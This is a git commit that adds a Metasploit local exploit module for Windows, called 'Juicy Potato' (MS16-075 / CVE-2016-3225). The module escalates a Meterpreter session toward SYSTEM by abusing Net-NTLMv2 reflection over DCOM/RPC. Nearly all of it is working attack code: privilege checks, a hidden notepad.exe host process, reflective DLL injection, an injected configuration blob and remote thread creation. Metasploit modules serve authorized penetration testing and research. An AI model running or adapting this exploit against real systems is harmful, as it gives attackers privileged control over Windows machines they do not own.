feat: add juicy potato post module, fixes #11229

2019-01-10 17:20:43 +01:00 · 2019-01-10 17:20:43 +01:00 · dc2d3c5774
parent 5f244643bd
commit dc2d3c5774
1 changed files with 171 additions and 0 deletions
--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/reflective_dll_injection'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)',
+      'Description'    => %q(
+        Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
+        to achieve a SYSTEM handle for elevation of privilege. Currently the module
+        does not spawn as SYSTEM, however once achieving a shell, one can easily
+        use incognito to impersonate the token. It requires a CLSID string.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'FoxGloveSec', # the original Potato exploit
+          'breenmachine', # Rotten Potato NG!
+          'decoder', # Lonely / Juicy Potato
+          'ohpe', # Juicy Potato
+          'phra' # MSF Module
+        ],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Platform'       => 'win',
+      'SessionTypes'   => ['meterpreter'],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'none',
+          'WfsDelay' => '0',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Targets'        =>
+        [
+          ['Automatic', {}],
+          ['Windows x86', { 'Arch' => ARCH_X86 }],
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'Payload'         =>
+        {
+          'DisableNops' => true
+        },
+      'References'      =>
+        [
+          ['MSB', 'MS16-075'],
+          ['CVE', '2016-3225'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
+          ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
+          ['URL', 'https://github.com/breenmachine/RottenPotatoNG'],
+          ['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'],
+          ['URL', 'https://ohpe.it/juicy-potato/']
+        ],
+      'DisclosureDate' => 'Jan 16 2016',
+      'DefaultTarget'  => 0
+    }))
+
+    register_options(
+      [
+        OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]),
+        OptPort.new('DCOM_PORT', [ true, 'Set listening port for MITM DCOM communication', 6666 ])
+      ])
+
+    register_advanced_options(
+      [
+        OptAddress.new('RPC_IP', [ true, 'Set RPC_IP value', '127.0.0.1' ]),
+        OptPort.new('RPC_PORT', [ true, 'Set RPC_PORT value', 135 ]),
+        OptAddress.new('DCOM_IP', [ true, 'Set DCOM_IP value', '127.0.0.1' ])
+      ])
+  end
+
+  def assign_target
+    if target.name == 'Automatic'
+      case sysinfo["Architecture"]
+      when 'x86'
+        vprint_status("Found we are on an x86 target")
+        my_target = targets[1]
+      when 'x64'
+        vprint_status("Found we are on an x64 target")
+        my_target = targets[2]
+      else
+        fail_with(Failure::NoTarget, "Unable to determine target")
+      end
+    else
+      my_target = target
+    end
+    return my_target
+  end
+
+  def verify_arch(my_target)
+    if my_target["Arch"] != sysinfo["Architecture"]
+      print_error("Assigned Target Arch = #{my_target.opts['Arch']}")
+      print_error("Actual Target Arch = #{sysinfo['Architecture']}")
+      fail_with(Failure::BadConfig, "Assigned Arch does not match reality")
+    end
+    if client.arch != sysinfo["Architecture"]
+      fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported")
+    else
+      vprint_good("Current payload and target Arch match....")
+    end
+  end
+
+  def check
+    privs = client.sys.config.getprivs
+    if privs.include?('SeImpersonatePrivilege')
+      return Exploit::CheckCode::Appears
+    end
+    if privs.include?('SeAssignPrimaryToken')
+      return Exploit::CheckCode::Appears
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+    my_target = assign_target
+    print_status("#{my_target['Arch']}")
+    verify_arch(my_target)
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
+    end
+    if my_target.opts['Arch'] == 'x64'
+      dll_file_name = 'juicypotato.x64.dll'
+      vprint_status("Assigning payload juicypotato.x64.dll")
+    elsif my_target.opts['Arch'] == 'x86'
+      dll_file_name = 'juicypotato.x86.dll'
+      vprint_status("Assigning payload juicypotato.x86.dll")
+    else
+      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
+    end
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    library_path = ::File.join(Msf::Config.data_directory, "exploits", "juicypotato", dll_file_name)
+    library_path = ::File.expand_path(library_path)
+    print_status("Injecting exploit into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+    print_status("Exploit injected. Injecting exploit configuration into #{process.pid}...")
+    #payload_mem = inject_into_process(process, payload.encoded)
+    configuration = "#{datastore['CLSID']}\x00"
+    configuration += "#{datastore['DCOM_PORT']}\x00"
+    configuration += "#{datastore['RPC_IP']}\x00"
+    configuration += "#{datastore['RPC_PORT']}\x00"
+    configuration += "#{datastore['DCOM_IP']}\x00"
+    payload_mem = inject_into_process(process, configuration)
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status('Configuration injected. Executing exploit...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+    print_good('Exploit finished, check incognito module.')
+  end
+end